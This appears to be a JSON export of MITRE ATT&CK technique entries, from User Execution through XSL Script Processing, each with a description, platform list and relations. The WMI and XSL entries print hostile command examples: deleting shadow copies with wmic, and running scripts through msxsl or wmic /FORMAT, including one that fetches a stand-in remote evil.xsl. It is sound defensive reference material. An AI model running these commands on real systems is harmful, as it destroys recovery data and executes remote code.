"description": "An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533).\n\nWhile [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://app.tidalcyber.com/technique/4f4ea659-7653-4bfd-a525-b2af32c5899b).\n\nAdversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://app.tidalcyber.com/technique/acf828f4-7e7e-43e1-bf15-ceab42021430), allowing direct control of the system to the adversary; running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://app.tidalcyber.com/technique/17f9e46d-4e3d-4491-a0d9-0cc042531d6e)s; or downloading and executing malware for [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872).<sup>[[Talos Roblox Scam 2023](https://app.tidalcyber.com/references/9371ee4a-ac23-5acb-af3f-132ef3645392)]</sup><sup>[[Krebs Discord Bookmarks 2023](https://app.tidalcyber.com/references/1d0a21f4-9a8e-5514-894a-3d55263ff973)]</sup>\n\nFor example, tech support scams can be facilitated through [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://app.tidalcyber.com/technique/acf828f4-7e7e-43e1-bf15-ceab42021430).<sup>[[Telephone Attack Delivery](https://app.tidalcyber.com/references/9670da7b-0600-4072-9ecc-65a918b89ac5)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Containers",
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "b84435ab-2ff4-4b6f-ba71-b4b815474872",
|
||
"value": "User Execution"
|
||
},
|
||
{
|
||
"description": "Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.<sup>[[volexity_0day_sophos_FW](https://app.tidalcyber.com/references/85bee18e-216d-4ea6-b34e-b071e3f63382)]</sup> Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.\n\nIn some cases, adversaries may abuse inactive accounts: for example, those belonging to individuals who are no longer part of an organization. Using these accounts may allow the adversary to evade detection, as the original account user will not be present to identify any anomalous activity taking place on their account.<sup>[[CISA MFA PrintNightmare](https://app.tidalcyber.com/references/fa03324e-c79c-422e-80f1-c270fd87d4e2)]</sup>\n\nThe overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.<sup>[[TechNet Credential Theft](https://app.tidalcyber.com/references/5c183c97-0ab2-4b75-8dbc-9db92a929ff4)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Azure AD",
|
||
"Containers",
|
||
"Google Workspace",
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Office 365",
|
||
"SaaS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "a9b7eb2f-63e7-41bc-9d77-f7c4cede5406",
|
||
"value": "Valid Accounts"
|
||
},
|
||
{
|
||
"description": "An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.\n\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://app.tidalcyber.com/technique/4462ce9d-0a5a-427d-8160-7b307b50cfbd) due to use of specific devices or applications for video recording rather than capturing the victim's screen.\n\nIn macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. <sup>[[objective-see 2017 review](https://app.tidalcyber.com/references/26b757c8-25cd-42ef-bef2-eb7a28455d57)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "0c81e13a-3608-4171-8075-9f70b2934028",
|
||
"value": "Video Capture"
|
||
},
|
||
{
|
||
"description": "Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8) during automated discovery to shape follow-on behaviors.<sup>[[Deloitte Environment Awareness](https://app.tidalcyber.com/references/af842a1f-8f39-4b4f-b4d2-0bbb810e6c31)]</sup>\n\nAdversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8) such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.<sup>[[Unit 42 Pirpi July 2015](https://app.tidalcyber.com/references/42d35b93-2866-46d8-b8ff-675df05db9db)]</sup>\n\n",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8",
|
||
"value": "Virtualization/Sandbox Evasion"
|
||
},
|
||
{
|
||
"description": "Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. <sup>[[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)]</sup>\n\nEncryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.\n\nAdversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as [Modify System Image](https://app.tidalcyber.com/technique/f435a5ff-78d2-44de-b464-2b5528f94adc), [Reduce Key Space](https://app.tidalcyber.com/technique/aa6595d5-1b2e-45a8-8caf-b0968aeab2ba), and [Disable Crypto Hardware](https://app.tidalcyber.com/technique/f413afa2-406d-4e8e-a12c-5f1b8ef05d8a), an adversary can negatively effect and/or eliminate a device’s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts. <sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Network"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "8cf19b3d-c9fa-4d71-a6ab-dc0e236e57d4",
|
||
"value": "Weaken Encryption"
|
||
},
|
||
{
|
||
"description": "Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "a729feee-8e21-444e-8eea-2ec595b09931",
|
||
"value": "Web Service"
|
||
},
|
||
{
|
||
"description": "Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.<sup>[[WMI 1-3](https://app.tidalcyber.com/references/fe0a3b0c-8526-5a0d-acb8-660bbc0c9328)]</sup> WMI is an administration feature that provides a uniform environment to access Windows system components.\n\nThe WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) such as [Distributed Component Object Model](https://app.tidalcyber.com/technique/ebc5fabb-5634-49f2-8979-94ea98da114a) and [Windows Remote Management](https://app.tidalcyber.com/technique/c2866fd3-754e-4b40-897a-e73a8c1fcf7b).<sup>[[WMI 1-3](https://app.tidalcyber.com/references/fe0a3b0c-8526-5a0d-acb8-660bbc0c9328)]</sup> Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.<sup>[[WMI 1-3](https://app.tidalcyber.com/references/fe0a3b0c-8526-5a0d-acb8-660bbc0c9328)]</sup> <sup>[[Mandiant WMI](https://app.tidalcyber.com/references/8d237948-7b10-5055-b9e6-52e6cab16f32)]</sup>\n\nAn adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for [Discovery](https://app.tidalcyber.com/tactics/ee7e5a85-a940-46e4-b408-12956f3baafa) as well as [Execution](https://app.tidalcyber.com/tactics/dad2337d-6d35-410a-acc5-da36ff83ee44) of commands and payloads.<sup>[[Mandiant WMI](https://app.tidalcyber.com/references/8d237948-7b10-5055-b9e6-52e6cab16f32)]</sup> For example, `wmic.exe` can be abused by an adversary to delete shadow copies with the command `wmic.exe Shadowcopy Delete` (i.e., [Inhibit System Recovery](https://app.tidalcyber.com/technique/d207c03b-fbe7-420e-a053-339f4650c043)).<sup>[[WMI 6](https://app.tidalcyber.com/references/df07a086-0d38-570b-b0c5-9f5061212db7)]</sup>\n\n**Note:** `wmic.exe` is deprecated as of January of 2024, with the WMIC feature being “disabled by default” on Windows 11+. WMIC will be removed from subsequent Windows releases and replaced by [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) as the primary WMI interface.<sup>[[WMI 7,8](https://app.tidalcyber.com/references/819cecb2-5bd3-5c20-bbda-372516b00d6e)]</sup> In addition to PowerShell and tools like `wbemtool.exe`, COM APIs can also be used to programmatically interact with WMI via C++, .NET, VBScript, etc.<sup>[[WMI 7,8](https://app.tidalcyber.com/references/819cecb2-5bd3-5c20-bbda-372516b00d6e)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "c37795d9-8970-461f-9491-3086d6b4b69a",
|
||
"value": "Windows Management Instrumentation"
|
||
},
|
||
{
|
||
"description": "Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. <sup>[[Microsoft XSLT Script Mar 2017](https://app.tidalcyber.com/references/7ff47640-2a98-4a55-939a-ab6c8c8d2d09)]</sup>\n\nAdversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to [Trusted Developer Utilities Proxy Execution](https://app.tidalcyber.com/technique/8811114c-a0cf-479c-b95d-c036467749e3), the Microsoft common line transformation utility binary (msxsl.exe) <sup>[[Microsoft msxsl.exe](https://app.tidalcyber.com/references/a25d664c-d109-466f-9b6a-7e9ea8c57895)]</sup> can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. <sup>[[Penetration Testing Lab MSXSL July 2017](https://app.tidalcyber.com/references/2f1adf20-a4b8-48c1-861f-0a44271765d7)]</sup> Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. <sup>[[Reaqta MSXSL Spearphishing MAR 2018](https://app.tidalcyber.com/references/927737c9-63a3-49a6-85dc-620e055aaf0a)]</sup> Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.<sup>[[XSL Bypass Mar 2019](https://app.tidalcyber.com/references/e4e2cf48-47e0-45d8-afc2-a35635f7e880)]</sup>\n\nCommand-line examples:<sup>[[Penetration Testing Lab MSXSL July 2017](https://app.tidalcyber.com/references/2f1adf20-a4b8-48c1-861f-0a44271765d7)]</sup><sup>[[XSL Bypass Mar 2019](https://app.tidalcyber.com/references/e4e2cf48-47e0-45d8-afc2-a35635f7e880)]</sup>\n\n* <code>msxsl.exe customers[.]xml script[.]xsl</code>\n* <code>msxsl.exe script[.]xsl script[.]xsl</code>\n* <code>msxsl.exe script[.]jpeg script[.]jpeg</code>\n\nAnother variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a) to invoke JScript or VBScript within an XSL file.<sup>[[LOLBAS Wmic](https://app.tidalcyber.com/references/497e73d4-9f27-4b30-ba09-f152ce866d0f)]</sup> This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://app.tidalcyber.com/technique/b1da2b02-9ade-45e0-a795-ec1b19e5316a)/ \"Squiblydoo\" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a) provided they utilize the /FORMAT switch.<sup>[[XSL Bypass Mar 2019](https://app.tidalcyber.com/references/e4e2cf48-47e0-45d8-afc2-a35635f7e880)]</sup>\n\nCommand-line examples:<sup>[[XSL Bypass Mar 2019](https://app.tidalcyber.com/references/e4e2cf48-47e0-45d8-afc2-a35635f7e880)]</sup><sup>[[LOLBAS Wmic](https://app.tidalcyber.com/references/497e73d4-9f27-4b30-ba09-f152ce866d0f)]</sup>\n\n* Local File: <code>wmic process list /FORMAT:evil[.]xsl</code>\n* Remote File: <code>wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”</code>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "4eb755e6-41f1-4c92-b14d-87a61a446258",
|
||
"value": "XSL Script Processing"
|
||
}
|
||
],
|
||
"version": 1
|
||
}
|